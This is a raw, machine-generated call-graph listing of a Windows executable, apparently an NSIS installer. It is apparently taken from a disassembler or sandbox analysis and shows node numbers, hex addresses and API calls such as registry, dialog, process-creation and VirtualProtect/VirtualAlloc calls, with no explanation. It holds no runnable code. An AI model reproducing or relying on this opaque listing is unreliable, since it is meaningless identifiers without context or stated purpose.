4530->4531 4532 4024a2 RegQueryValueExW 4531->4532 4535 40288b 4531->4535 4533 4024c8 RegCloseKey 4532->4533 4534 4024c2 4532->4534 4533->4535 4534->4533 4543 40632f wsprintfW 4534->4543 4539 402c41 17 API calls 4538->4539 4540 402c98 4539->4540 4541 406255 RegOpenKeyExW 4540->4541 4542 40248e 4541->4542 4542->4530 4543->4533 5661 402104 5662 402c41 17 API calls 5661->5662 5663 40210b 5662->5663 5664 402c41 17 API calls 5663->5664 5665 402115 5664->5665 5666 402c41 17 API calls 5665->5666 5667 40211f 5666->5667 5668 402c41 17 API calls 5667->5668 5669 402129 5668->5669 5670 402c41 17 API calls 5669->5670 5672 402133 5670->5672 5671 402172 CoCreateInstance 5676 402191 5671->5676 5672->5671 5673 402c41 17 API calls 5672->5673 5673->5671 5674 401423 24 API calls 5675 402250 5674->5675 5676->5674 5676->5675 5677 73f9103d 5680 73f9101b 5677->5680 5681 73f91516 GlobalFree 5680->5681 5682 73f91020 5681->5682 5683 73f91027 GlobalAlloc 5682->5683 5684 73f91024 5682->5684 5683->5684 5685 73f9153d 3 API calls 5684->5685 5686 73f9103b 5685->5686 4787 403e86 4788 403fd9 4787->4788 4789 403e9e 4787->4789 4791 40402a 4788->4791 4792 403fea GetDlgItem GetDlgItem 4788->4792 4789->4788 4790 403eaa 4789->4790 4794 403eb5 SetWindowPos 4790->4794 4795 403ec8 4790->4795 4793 404084 4791->4793 4801 401389 2 API calls 4791->4801 4796 40435f 18 API calls 4792->4796 4797 4043ab SendMessageW 4793->4797 4818 403fd4 4793->4818 4794->4795 4798 403ee5 4795->4798 4799 403ecd ShowWindow 4795->4799 4800 404014 SetClassLongW 4796->4800 4826 404096 4797->4826 4802 403f07 4798->4802 4803 403eed DestroyWindow 4798->4803 4799->4798 4804 40140b 2 API calls 4800->4804 4805 40405c 4801->4805 4807 403f0c SetWindowLongW 4802->4807 4808 403f1d 4802->4808 4806 404309 4803->4806 4804->4791 4805->4793 4811 404060 SendMessageW 4805->4811 4817 404319 ShowWindow 4806->4817 4806->4818 4807->4818 4809 403fc6 4808->4809 4810 403f29 GetDlgItem 4808->4810 4868 4043c6 4809->4868 4814 403f59 4810->4814 4815 403f3c SendMessageW IsWindowEnabled 4810->4815 4811->4818 4812 40140b 2 API calls 4812->4826 4813 4042ea DestroyWindow EndDialog 4813->4806 4820 403f66 4814->4820 4822 403fad SendMessageW 4814->4822 4823 403f79 4814->4823 4832 403f5e 4814->4832 4815->4814 4815->4818 4817->4818 4819 40640a 17 API calls 4819->4826 4820->4822 4820->4832 4821 40435f 18 API calls 4821->4826 4822->4809 4827 403f81 4823->4827 4828 403f96 4823->4828 4825 403f94 4825->4809 4826->4812 4826->4813 4826->4818 4826->4819 4826->4821 4849 40422a DestroyWindow 4826->4849 4859 40435f 4826->4859 4830 40140b 2 API calls 4827->4830 4829 40140b 2 API calls 4828->4829 4831 403f9d 4829->4831 4830->4832 4831->4809 4831->4832 4865 404338 4832->4865 4834 404111 GetDlgItem 4835 404126 4834->4835 4836 40412e ShowWindow KiUserCallbackDispatcher 4834->4836 4835->4836 4862 404381 EnableWindow 4836->4862 4838 404158 EnableWindow 4843 40416c 4838->4843 4839 404171 GetSystemMenu EnableMenuItem SendMessageW 4840 4041a1 SendMessageW 4839->4840 4839->4843 4840->4843 4842 403e67 18 API calls 4842->4843 4843->4839 4843->4842 4863 404394 SendMessageW 4843->4863 4864 4063e8 lstrcpynW 4843->4864 4845 4041d0 lstrlenW 4846 40640a 17 API calls 4845->4846 4847 4041e6 SetWindowTextW 4846->4847 4848 401389 2 API calls 4847->4848 4848->4826 4849->4806 4850 404244 CreateDialogParamW 4849->4850 4850->4806 4851 404277 4850->4851 4852 40435f 18 API calls 4851->4852 4853 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4852->4853 4854 401389 2 API calls 4853->4854 4855 4042c8 4854->4855 4855->4818 4856 4042d0 ShowWindow 4855->4856 4857 4043ab SendMessageW 4856->4857 4858 4042e8 4857->4858 4858->4806 4860 40640a 17 API calls 4859->4860 4861 40436a SetDlgItemTextW 4860->4861 4861->4834 4862->4838 4863->4843 4864->4845 4866 404345 SendMessageW 4865->4866 4867 40433f 4865->4867 4866->4825 4867->4866 4869 404489 4868->4869 4870 4043de GetWindowLongW 4868->4870 4869->4818 4870->4869 4871 4043f3 4870->4871 4871->4869 4872 404420 GetSysColor 4871->4872 4873 404423 4871->4873 4872->4873 4874 404433 SetBkMode 4873->4874 4875 404429 SetTextColor 4873->4875 4876 404451 4874->4876 4877 40444b GetSysColor 4874->4877 4875->4874 4878 404462 4876->4878 4879 404458 SetBkColor 4876->4879 4877->4876 4878->4869 4880 404475 DeleteObject 4878->4880 4881 40447c CreateBrushIndirect 4878->4881 4879->4878 4880->4881 4881->4869 5687 401f06 5688 402c41 17 API calls 5687->5688 5689 401f0c 5688->5689 5690 405450 24 API calls 5689->5690 5691 401f16 5690->5691 5692 4059d1 2 API calls 5691->5692 5693 401f1c 5692->5693 5695 40288b 5693->5695 5696 406873 5 API calls 5693->5696 5698 401f3f CloseHandle 5693->5698 5697 401f31 5696->5697 5697->5698 5700 40632f wsprintfW 5697->5700 5698->5695 5700->5698 5701 404809 5702 404819 5701->5702 5703 40483f 5701->5703 5704 40435f 18 API calls 5702->5704 5705 4043c6 8 API calls 5703->5705 5706 404826 SetDlgItemTextW 5704->5706 5707 40484b 5705->5707 5706->5703 5708 40190c 5709 401943 5708->5709 5710 402c41 17 API calls 5709->5710 5711 401948 5710->5711 5712 405afa 67 API calls 5711->5712 5713 401951 5712->5713 5714 40230c 5715 402314 5714->5715 5719 40231a 5714->5719 5716 402c41 17 API calls 5715->5716 5716->5719 5717 402c41 17 API calls 5718 402328 5717->5718 5720 402c41 17 API calls 5718->5720 5722 402336 5718->5722 5719->5717 5719->5718 5720->5722 5721 402c41 17 API calls 5723 40233f WritePrivateProfileStringW 5721->5723 5722->5721 5724 401f8c 5725 402c41 17 API calls 5724->5725 5726 401f93 5725->5726 5727 4067c2 5 API calls 5726->5727 5728 401fa2 5727->5728 5729 401fbe GlobalAlloc 5728->5729 5731 402026 5728->5731 5730 401fd2 5729->5730 5729->5731 5732 4067c2 5 API calls 5730->5732 5733 401fd9 5732->5733 5734 4067c2 5 API calls 5733->5734 5735 401fe3 5734->5735 5735->5731 5739 40632f wsprintfW 5735->5739 5737 402018 5740 40632f wsprintfW 5737->5740 5739->5737 5740->5731 4986 40238e 4987 4023c1 4986->4987 4988 402396 4986->4988 4990 402c41 17 API calls 4987->4990 4989 402c81 17 API calls 4988->4989 4991 40239d 4989->4991 4992 4023c8 4990->4992 4993 4023a7 4991->4993 4995 4023d5 4991->4995 4998 402cff 4992->4998 4996 402c41 17 API calls 4993->4996 4997 4023ae RegDeleteValueW RegCloseKey 4996->4997 4997->4995 4999 402d0c 4998->4999 5000 402d13 4998->5000 4999->4995 5000->4999 5002 402d44 5000->5002 5003 406255 RegOpenKeyExW 5002->5003 5004 402d72 5003->5004 5005 402d76 5004->5005 5006 402dec 5004->5006 5007 402d98 RegEnumKeyW 5005->5007 5008 402daf RegCloseKey 5005->5008 5009 402dd0 RegCloseKey 5005->5009 5011 402d44 6 API calls 5005->5011 5006->4999 5007->5005 5007->5008 5010 4067c2 5 API calls 5008->5010 5009->5006 5012 402dbf 5010->5012 5011->5005 5013 402de0 RegDeleteKeyW 5012->5013 5014 402dc3 5012->5014 5013->5006 5014->5006 5741 40190f 5742 402c41 17 API calls 5741->5742 5743 401916 5742->5743 5744 405a4e MessageBoxIndirectW 5743->5744 5745 40191f 5744->5745 5746 40558f 5747 4055b0 GetDlgItem GetDlgItem GetDlgItem 5746->5747 5748 405739 5746->5748 5791 404394 SendMessageW 5747->5791 5750 405742 GetDlgItem CreateThread CloseHandle 5748->5750 5751 40576a 5748->5751 5750->5751 5753 405795 5751->5753 5754 405781 ShowWindow ShowWindow 5751->5754 5755 4057ba 5751->5755 5752 405620 5758 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5752->5758 5756 4057f5 5753->5756 5760 4057a9 5753->5760 5761 4057cf ShowWindow 5753->5761 5793 404394 SendMessageW 5754->5793 5757 4043c6 8 API calls 5755->5757 5756->5755 5767 405803 SendMessageW 5756->5767 5762 4057c8 5757->5762 5765 405695 5758->5765 5766 405679 SendMessageW SendMessageW 5758->5766 5768 404338 SendMessageW 5760->5768 5763 4057e1 5761->5763 5764 4057ef 5761->5764 5769 405450 24 API calls 5763->5769 5770 404338 SendMessageW 5764->5770 5771 4056a8 5765->5771 5772 40569a SendMessageW 5765->5772 5766->5765 5767->5762 5773 40581c CreatePopupMenu 5767->5773 5768->5755 5769->5764 5770->5756 5775 40435f 18 API calls 5771->5775 5772->5771 5774 40640a 17 API calls 5773->5774 5776 40582c AppendMenuW 5774->5776 5777 4056b8 5775->5777 5778 405849 GetWindowRect 5776->5778 5779 40585c TrackPopupMenu 5776->5779 5780 4056c1 ShowWindow 5777->5780 5781 4056f5 GetDlgItem SendMessageW 5777->5781 5778->5779 5779->5762 5782 405877 5779->5782 5783 4056e4 5780->5783 5784 4056d7 ShowWindow 5780->5784 5781->5762 5785 40571c SendMessageW SendMessageW 5781->5785 5786 405893 SendMessageW 5782->5786 5792 404394 SendMessageW 5783->5792 5784->5783 5785->5762 5786->5786 5787 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5786->5787 5789 4058d5 SendMessageW 5787->5789 5789->5789 5790 4058fe GlobalUnlock SetClipboardData CloseClipboard 5789->5790 5790->5762 5791->5752 5792->5781 5793->5753 5794 401491 5795 405450 24 API calls 5794->5795 5796 401498 5795->5796 5804 401d14 5805 402c1f 17 API calls 5804->5805 5806 401d1b 5805->5806 5807 402c1f 17 API calls 5806->5807 5808 401d27 GetDlgItem 5807->5808 5809 402592 5808->5809 5810 404495 lstrcpynW lstrlenW 5811 403a96 5812 403aa1 5811->5812 5813 403aa5 5812->5813 5814 403aa8 GlobalAlloc 5812->5814 5814->5813 5815 402598 5816 4025c7 5815->5816 5817 4025ac 5815->5817 5819 4025fb 5816->5819 5820 4025cc 5816->5820 5818 402c1f 17 API calls 5817->5818 5827 4025b3 5818->5827 5822 402c41 17 API calls 5819->5822 5821 402c41 17 API calls 5820->5821 5823 4025d3 WideCharToMultiByte lstrlenA 5821->5823 5824 402602 lstrlenW 5822->5824 5823->5827 5824->5827 5825 402645 5826 40262f 5826->5825 5828 405f90 WriteFile 5826->5828 5827->5825 5827->5826 5829 405fbf 5 API calls 5827->5829 5828->5825 5829->5826 5830 40451e 5831 404536 5830->5831 5835 404650 5830->5835 5836 40435f 18 API calls 5831->5836 5832 4046ba 5833 404784 5832->5833 5834 4046c4 GetDlgItem 5832->5834 5839 4043c6 8 API calls 5833->5839 5840 4046de 5834->5840 5841 404745 5834->5841 5835->5832 5835->5833 5837 40468b GetDlgItem SendMessageW 5835->5837 5838 40459d 5836->5838 5863 404381 EnableWindow 5837->5863 5844 40435f 18 API calls 5838->5844 5845 40477f 5839->5845 5840->5841 5846 404704 SendMessageW LoadCursorW SetCursor 5840->5846 5841->5833 5842 404757 5841->5842 5847 40476d 5842->5847 5848 40475d SendMessageW 5842->5848 5850 4045aa CheckDlgButton 5844->5850 5864 4047cd 5846->5864 5847->5845 5852 404773 SendMessageW 5847->5852 5848->5847 5849 4046b5 5853 4047a9 SendMessageW 5849->5853 5861 404381 EnableWindow 5850->5861 5852->5845 5853->5832 5856 4045c8 GetDlgItem 5862 404394 SendMessageW 5856->5862 5858 4045de SendMessageW 5859 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5858->5859 5860 4045fb GetSysColor 5858->5860 5859->5845 5860->5859 5861->5856 5862->5858 5863->5849 5867 405a14 ShellExecuteExW 5864->5867 5866 404733 LoadCursorW SetCursor 5866->5841 5867->5866 5868 40149e 5869 4022f7 5868->5869 5870 4014ac PostQuitMessage 5868->5870 5870->5869 5871 401c1f 5872 402c1f 17 API calls 5871->5872 5873 401c26 5872->5873 5874 402c1f 17 API calls 5873->5874 5875 401c33 5874->5875 5876 402c41 17 API calls 5875->5876 5877 401c48 5875->5877 5876->5877 5878 401c58 5877->5878 5879 402c41 17 API calls 5877->5879 5880 401c63 5878->5880 5881 401caf 5878->5881 5879->5878 5882 402c1f 17 API calls 5880->5882 5883 402c41 17 API calls 5881->5883 5885 401c68 5882->5885 5884 401cb4 5883->5884 5886 402c41 17 API calls 5884->5886 5887 402c1f 17 API calls 5885->5887 5888 401cbd FindWindowExW 5886->5888 5889 401c74 5887->5889 5892 401cdf 5888->5892 5890 401c81 SendMessageTimeoutW 5889->5890 5891 401c9f SendMessageW 5889->5891 5890->5892 5891->5892 5893 402aa0 SendMessageW 5894 402ac5 5893->5894 5895 402aba InvalidateRect 5893->5895 5895->5894 5896 402821 5897 402827 5896->5897 5898 402ac5 5897->5898 5899 40282f FindClose 5897->5899 5899->5898 5900 4015a3 5901 402c41 17 API calls 5900->5901 5902 4015aa SetFileAttributesW 5901->5902 5903 4015bc 5902->5903 4544 4034a5 SetErrorMode GetVersion 4545 4034e4 4544->4545 4546 4034ea 4544->4546 4547 4067c2 5 API calls 4545->4547 4548 406752 3 API calls 4546->4548 4547->4546 4549 403500 lstrlenA 4548->4549 4549->4546 4550 403510 4549->4550 4551 4067c2 5 API calls 4550->4551 4552 403517 4551->4552 4553 4067c2 5 API calls 4552->4553 4554 40351e 4553->4554 4555 4067c2 5 API calls 4554->4555 4556 40352a #17 OleInitialize SHGetFileInfoW 4555->4556 4634 4063e8 lstrcpynW 4556->4634 4559 403576 GetCommandLineW 4635 4063e8 lstrcpynW 4559->4635 4561 403588 4562 405cea CharNextW 4561->4562 4563 4035ad CharNextW 4562->4563 4564 4036d7 GetTempPathW 4563->4564 4570 4035c6 4563->4570 4636 403474 4564->4636 4566 4036ef 4567 4036f3 GetWindowsDirectoryW lstrcatW 4566->4567 4568 403749 DeleteFileW 4566->4568 4571 403474 12 API calls 4567->4571 4646 402f30 GetTickCount GetModuleFileNameW 4568->4646 4572 405cea CharNextW 4570->4572 4576 4036c0 4570->4576 4578 4036c2 4570->4578 4574 40370f 4571->4574 4572->4570 4573 40375d 4580 405cea CharNextW 4573->4580 4616 403800 4573->4616 4629 403810 4573->4629 4574->4568 4575 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4574->4575 4579 403474 12 API calls 4575->4579 4576->4564 4732 4063e8 lstrcpynW 4578->4732 4584 403741 4579->4584 4597 40377c 4580->4597 4584->4568 4584->4629 4585 40394a 4588 403952 GetCurrentProcess OpenProcessToken 4585->4588 4589 4039ce ExitProcess 4585->4589 4586 40382a 4744 405a4e 4586->4744 4590 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4588->4590 4591 40399e 4588->4591 4590->4591 4596 4067c2 5 API calls 4591->4596 4593 403840 4599 4059b9 5 API calls 4593->4599 4594 4037da 4598 405dc5 18 API calls 4594->4598 4604 4039a5 4596->4604 4597->4593 4597->4594 4605 4037e6 4598->4605 4600 403845 lstrcatW 4599->4600 4601 403861 lstrcatW lstrcmpiW 4600->4601 4602 403856 lstrcatW 4600->4602 4607 40387d 4601->4607 4601->4629 4602->4601 4603 4039ba ExitWindowsEx 4603->4589 4608 4039c7 4603->4608 4604->4603 4604->4608 4605->4629 4733 4063e8 lstrcpynW 4605->4733 4610 403882 4607->4610 4611 403889 4607->4611 4612 40140b 2 API calls 4608->4612 4609 4037f5 4734 4063e8 lstrcpynW 4609->4734 4614 40591f 4 API calls 4610->4614 4615 40599c 2 API calls 4611->4615 4612->4589 4617 403887 4614->4617 4618 40388e SetCurrentDirectoryW 4615->4618 4676 403ad8 4616->4676 4617->4618 4619 4038a9 4618->4619 4620 40389e 4618->4620 4749 4063e8 lstrcpynW 4619->4749 4748 4063e8 lstrcpynW 4620->4748 4623 40640a 17 API calls 4624 4038e8 DeleteFileW 4623->4624 4625 4038f5 CopyFileW 4624->4625 4631 4038b7 4624->4631 4625->4631 4626 40393e 4628 4061ae 36 API calls 4626->4628 4627 4061ae 36 API calls 4627->4631 4628->4629 4735 4039e6 4629->4735 4630 40640a 17 API calls 4630->4631 4631->4623 4631->4626 4631->4627 4631->4630 4633 403929 CloseHandle 4631->4633 4750 4059d1 CreateProcessW 4631->4750 4633->4631 4634->4559 4635->4561 4637 40667c 5 API calls 4636->4637 4638 403480 4637->4638 4639 40348a 4638->4639 4640 405cbd 3 API calls 4638->4640 4639->4566 4641 403492 4640->4641 4642 40599c 2 API calls 4641->4642 4643 403498 4642->4643 4753 405f0d 4643->4753 4757 405ede GetFileAttributesW CreateFileW 4646->4757 4648 402f73 4665 402f80 4648->4665 4758 4063e8 lstrcpynW 4648->4758 4650 402f96 4651 405d09 2 API calls 4650->4651 4652 402f9c 4651->4652 4759 4063e8 lstrcpynW 4652->4759 4654 402fa7 GetFileSize 4655 4030a8 4654->4655 4659 402fbe 4654->4659 4656 402e8e 32 API calls 4655->4656 4658 4030af 4656->4658 4657 403447 ReadFile 4657->4659 4661 4030eb GlobalAlloc 4658->4661 4658->4665 4761 40345d SetFilePointer 4658->4761 4659->4655 4659->4657 4660 403143 4659->4660 4659->4665 4668 402e8e 32 API calls 4659->4668 4663 402e8e 32 API calls 4660->4663 4662 403102 4661->4662 4669 405f0d 2 API calls 4662->4669 4663->4665 4665->4573 4666 4030cc 4667 403447 ReadFile 4666->4667 4670 4030d7 4667->4670 4668->4659 4671 403113 CreateFileW 4669->4671 4670->4661 4670->4665 4671->4665 4672 40314d 4671->4672 4760 40345d SetFilePointer 4672->4760 4674 40315b 4675 4031d6 44 API calls 4674->4675 4675->4665 4677 4067c2 5 API calls 4676->4677 4678 403aec 4677->4678 4679 403af2 4678->4679 4680 403b04 4678->4680 4770 40632f wsprintfW 4679->4770 4681 4062b6 3 API calls 4680->4681 4682 403b34 4681->4682 4683 403b53 lstrcatW 4682->4683 4685 4062b6 3 API calls 4682->4685 4686 403b02 4683->4686 4685->4683 4762 403dae 4686->4762 4689 405dc5 18 API calls 4690 403b85 4689->4690 4691 403c19 4690->4691 4693 4062b6 3 API calls 4690->4693 4692 405dc5 18 API calls 4691->4692 4694 403c1f 4692->4694 4695 403bb7 4693->4695 4696 403c2f LoadImageW 4694->4696 4697 40640a 17 API calls 4694->4697 4695->4691 4703 403bd8 lstrlenW 4695->4703 4704 405cea CharNextW 4695->4704 4698 403cd5 4696->4698 4699 403c56 RegisterClassW 4696->4699 4697->4696 4702 40140b 2 API calls 4698->4702 4700 403cdf 4699->4700 4701 403c8c SystemParametersInfoW CreateWindowExW 4699->4701 4700->4629 4701->4698 4707 403cdb 4702->4707 4705 403be6 lstrcmpiW 4703->4705 4706 403c0c 4703->4706 4708 403bd5 4704->4708 4705->4706 4709 403bf6 GetFileAttributesW 4705->4709 4710 405cbd 3 API calls 4706->4710 4707->4700 4712 403dae 18 API calls 4707->4712 4708->4703 4711 403c02 4709->4711 4713 403c12 4710->4713 4711->4706 4714 405d09 2 API calls 4711->4714 4715 403cec 4712->4715 4771 4063e8 lstrcpynW 4713->4771 4714->4706 4717 403cf8 ShowWindow 4715->4717 4718 403d7b 4715->4718 4720 406752 3 API calls 4717->4720 4772 405523 OleInitialize 4718->4772 4722 403d10 4720->4722 4721 403d81 4723 403d85 4721->4723 4724 403d9d 4721->4724 4725 403d1e GetClassInfoW 4722->4725 4729 406752 3 API calls 4722->4729 4723->4700 4731 40140b 2 API calls 4723->4731 4728 40140b 2 API calls 4724->4728 4726 403d32 GetClassInfoW RegisterClassW 4725->4726 4727 403d48 DialogBoxParamW 4725->4727 4726->4727 4730 40140b 2 API calls 4727->4730 4728->4700 4729->4725 4730->4700 4731->4700 4732->4576 4733->4609 4734->4616 4736 403a01 4735->4736 4737 4039f7 CloseHandle 4735->4737 4738 403a15 4736->4738 4739 403a0b CloseHandle 4736->4739 4737->4736 4783 403a43 4738->4783 4739->4738 4742 405afa 67 API calls 4743 403819 OleUninitialize 4742->4743 4743->4585 4743->4586 4745 405a63 4744->4745 4746 403838 ExitProcess 4745->4746 4747 405a77 MessageBoxIndirectW 4745->4747 4747->4746 4748->4619 4749->4631 4751 405a10 4750->4751 4752 405a04 CloseHandle 4750->4752 4751->4631 4752->4751 4754 405f1a GetTickCount GetTempFileNameW 4753->4754 4755 405f50 4754->4755 4756 4034a3 4754->4756 4755->4754 4755->4756 4756->4566 4757->4648 4758->4650 4759->4654 4760->4674 4761->4666 4763 403dc2 4762->4763 4779 40632f wsprintfW 4763->4779 4765 403e33 4780 403e67 4765->4780 4767 403b63 4767->4689 4768 403e38 4768->4767 4769 40640a 17 API calls 4768->4769 4769->4768 4770->4686 4771->4691 4773 4043ab SendMessageW 4772->4773 4777 405546 4773->4777 4774 40556d 4775 4043ab SendMessageW 4774->4775 4776 40557f OleUninitialize 4775->4776 4776->4721 4777->4774 4778 401389 2 API calls 4777->4778 4778->4777 4779->4765 4781 40640a 17 API calls 4780->4781 4782 403e75 SetWindowTextW 4781->4782 4782->4768 4784 403a51 4783->4784 4785 403a1a 4784->4785 4786 403a56 FreeLibrary GlobalFree 4784->4786 4785->4742 4786->4785 4786->4786 5904 404ba6 5905 404bd2 5904->5905 5906 404bb6 5904->5906 5908 404c05 5905->5908 5909 404bd8 SHGetPathFromIDListW 5905->5909 5915 405a32 GetDlgItemTextW 5906->5915 5911 404bef SendMessageW 5909->5911 5912 404be8 5909->5912 5910 404bc3 SendMessageW 5910->5905 5911->5908 5914 40140b 2 API calls 5912->5914 5914->5911 5915->5910 5930 4029a8 5931 402c1f 17 API calls 5930->5931 5932 4029ae 5931->5932 5933 4029d5 5932->5933 5934 4029ee 5932->5934 5940 40288b 5932->5940 5935 4029da 5933->5935 5936 4029eb 5933->5936 5937 402a08 5934->5937 5938 4029f8 5934->5938 5944 4063e8 lstrcpynW 5935->5944 5936->5940 5945 40632f wsprintfW 5936->5945 5939 40640a 17 API calls 5937->5939 5941 402c1f 17 API calls 5938->5941 5939->5936 5941->5936 5944->5940 5945->5940 4914 73f92993 4915 73f929e3 4914->4915 4916 73f929a3 VirtualProtect 4914->4916 4916->4915 5946 4028ad 5947 402c41 17 API calls 5946->5947 5949 4028bb 5947->5949 5948 4028d1 5950 405eb9 2 API calls 5948->5950 5949->5948 5951 402c41 17 API calls 5949->5951 5952 4028d7 5950->5952 5951->5948 5974 405ede GetFileAttributesW CreateFileW 5952->5974 5954 4028e4 5955 4028f0 GlobalAlloc 5954->5955 5956 402987 5954->5956 5957 402909 5955->5957 5958 40297e CloseHandle 5955->5958 5959 4029a2 5956->5959 5960 40298f DeleteFileW 5956->5960 5975 40345d SetFilePointer 5957->5975 5958->5956 5960->5959 5962 40290f 5963 403447 ReadFile 5962->5963 5964 402918 GlobalAlloc 5963->5964 5965 402928 5964->5965 5966 40295c 5964->5966 5968 4031d6 44 API calls 5965->5968 5967 405f90 WriteFile 5966->5967 5969 402968 GlobalFree 5967->5969 5973 402935 5968->5973 5970 4031d6 44 API calls 5969->5970 5972 40297b 5970->5972 5971 402953 GlobalFree 5971->5966 5972->5958 5973->5971 5974->5954 5975->5962 5983 401a30 5984 402c41 17 API calls 5983->5984 5985 401a39 ExpandEnvironmentStringsW 5984->5985 5986 401a4d 5985->5986 5988 401a60 5985->5988 5987 401a52 lstrcmpW 5986->5987 5986->5988 5987->5988 5066 402032 5067 402044 5066->5067 5068 4020f6 5066->5068 5069 402c41 17 API calls 5067->5069 5070 401423 24 API calls 5068->5070 5071 40204b 5069->5071 5077 402250 5070->5077 5072 402c41 17 API calls 5071->5072 5073 402054 5072->5073 5074 40206a LoadLibraryExW 5073->5074 5075 40205c GetModuleHandleW 5073->5075 5074->5068 5076 40207b 5074->5076 5075->5074 5075->5076 5089 406831 WideCharToMultiByte 5076->5089 5080 4020c5 5084 405450 24 API calls 5080->5084 5081 40208c 5082 402094 5081->5082 5083 4020ab 5081->5083 5085 401423 24 API calls 5082->5085 5092 73f91777 5083->5092 5086 40209c 5084->5086 5085->5086 5086->5077 5087 4020e8 FreeLibrary 5086->5087 5087->5077 5090 40685b GetProcAddress 5089->5090 5091 402086 5089->5091 5090->5091 5091->5080 5091->5081 5093 73f917aa 5092->5093 5134 73f91b5f 5093->5134 5095 73f917b1 5096 73f918d6 5095->5096 5097 73f917c9 5095->5097 5098 73f917c2 5095->5098 5096->5086 5168 73f92394 5097->5168 5184 73f92352 5098->5184 5103 73f917ee 5104 73f9182d 5103->5104 5105 73f9180f 5103->5105 5107 73f9187e 5104->5107 5108 73f91833 5104->5108 5197 73f92569 5105->5197 5106 73f917df 5111 73f917e5 5106->5111 5117 73f917f0 5106->5117 5115 73f92569 10 API calls 5107->5115 5216 73f915c6 5108->5216 5109 73f917f8 5109->5103 5194 73f92d37 5109->5194 5111->5103 5178 73f92aac 5111->5178 5120 73f9186f 5115->5120 5116 73f91815 5208 73f915b4 5116->5208 5188 73f92724 5117->5188 5126 73f918c5 5120->5126 5222 73f9252c 5120->5222 5122 73f917f6 5122->5103 5123 73f92569 10 API calls 5123->5120 5126->5096 5128 73f918cf GlobalFree 5126->5128 5128->5096 5131 73f918b1 5131->5126 5226 73f9153d wsprintfW 5131->5226 5132 73f918aa FreeLibrary 5132->5131 5229 73f9121b GlobalAlloc 5134->5229 5136 73f91b83 5230 73f9121b GlobalAlloc 5136->5230 5138 73f91da9 GlobalFree GlobalFree GlobalFree 5139 73f91dc6 5138->5139 5154 73f91e10 5138->5154 5140 73f92192 5139->5140 5148 73f91ddb 5139->5148 5139->5154 5142 73f921b4 GetModuleHandleW 5140->5142 5140->5154 5141 73f91c64 GlobalAlloc 5160 73f91b8e 5141->5160 5145 73f921da 5142->5145 5146 73f921c5 LoadLibraryW 5142->5146 5143 73f91caf lstrcpyW 5147 73f91cb9 lstrcpyW 5143->5147 5144 73f91ccd GlobalFree 5144->5160 5237 73f9161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5145->5237 5146->5145 5146->5154 5147->5160 5148->5154 5233 73f9122c 5148->5233 5150 73f9222c 5153 73f92239 lstrlenW 5150->5153 5150->5154 5152 73f92064 5236 73f9121b GlobalAlloc 5152->5236 5238 73f9161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5153->5238 5154->5095 5155 73f921ec 5155->5150 5166 73f92216 GetProcAddress 5155->5166 5157 73f920ec 5157->5154 5163 73f92134 lstrcpyW 5157->5163 5159 73f92253 5159->5154 5160->5138 5160->5141 5160->5143 5160->5144 5160->5147 5160->5152 5160->5154 5160->5157 5161 73f91d0b 5160->5161 5162 73f91fa5 GlobalFree 5160->5162 5164 73f9122c 2 API calls 5160->5164 5161->5160 5231 73f9158f GlobalSize GlobalAlloc 5161->5231 5162->5160 5163->5154 5164->5160 5166->5150 5167 73f9206d 5167->5095 5169 73f923ac 5168->5169 5170 73f9122c GlobalAlloc lstrcpynW 5169->5170 5172 73f924d5 GlobalFree 5169->5172 5173 73f9247f GlobalAlloc CLSIDFromString 5169->5173 5174 73f92454 GlobalAlloc WideCharToMultiByte 5169->5174 5177 73f9249e 5169->5177 5240 73f912ba 5169->5240 5170->5169 5172->5169 5175 73f917cf 5172->5175 5173->5172 5174->5172 5175->5103 5175->5106 5175->5109 5177->5172 5244 73f926b8 5177->5244 5180 73f92abe 5178->5180 5179 73f92b63 EnumWindows 5183 73f92b81 5179->5183 5180->5179 5182 73f92c4d 5182->5103 5247 73f92a56 5183->5247 5185 73f92367 5184->5185 5186 73f92372 GlobalAlloc 5185->5186 5187 73f917c8 5185->5187 5186->5185 5187->5097 5192 73f92754 5188->5192 5189 73f927ef GlobalAlloc 5193 73f92812 5189->5193 5190 73f92802 5191 73f92808 GlobalSize 5190->5191 5190->5193 5191->5193 5192->5189 5192->5190 5193->5122 5195 73f92d42 5194->5195 5196 73f92d82 GlobalFree 5195->5196 5251 73f9121b GlobalAlloc 5197->5251 5199 73f92573 5200 73f925ec MultiByteToWideChar 5199->5200 5201 73f9261f lstrcpynW 5199->5201 5202 73f9260e StringFromGUID2 5199->5202 5203 73f92656 GlobalFree 5199->5203 5204 73f92632 wsprintfW 5199->5204 5205 73f9268b GlobalFree 5199->5205 5206 73f91272 2 API calls 5199->5206 5252 73f912e1 5199->5252 5200->5199 5201->5199 5202->5199 5203->5199 5204->5199 5205->5116 5206->5199 5256 73f9121b GlobalAlloc 5208->5256 5210 73f915b9 5211 73f915c6 2 API calls 5210->5211 5212 73f915c3 5211->5212 5213 73f91272 5212->5213 5214 73f9127b GlobalAlloc lstrcpynW 5213->5214 5215 73f912b5 GlobalFree 5213->5215 5214->5215 5215->5120 5217 73f915ff lstrcpyW 5216->5217 5218 73f915d2 wsprintfW 5216->5218 5221 73f91618 5217->5221 5218->5221 5221->5123 5223 73f91891 5222->5223 5224 73f9253a 5222->5224 5223->5131 5223->5132 5224->5223 5225 73f92556 GlobalFree 5224->5225 5225->5224 5227 73f91272 2 API calls 5226->5227 5228 73f9155e 5227->5228 5228->5126 5229->5136 5230->5160 5232 73f915ad 5231->5232 5232->5161 5239 73f9121b GlobalAlloc 5233->5239 5235 73f9123b lstrcpynW 5235->5154 5236->5167 5237->5155 5238->5159 5239->5235 5241 73f912c1 5240->5241 5242 73f9122c 2 API calls 5241->5242 5243 73f912df 5242->5243 5243->5169 5245 73f9271c 5244->5245 5246 73f926c6 VirtualAlloc 5244->5246 5245->5177 5246->5245 5248 73f92a61 5247->5248 5249 73f92a66 GetLastError 5248->5249 5250 73f92a71 5248->5250 5249->5250 5250->5182 5251->5199 5253 73f912ea 5252->5253 5254 73f9130c 5252->5254 5253->5254 5255 73f912f0 lstrcpyW 5253->5255 5254->5199 5255->5254 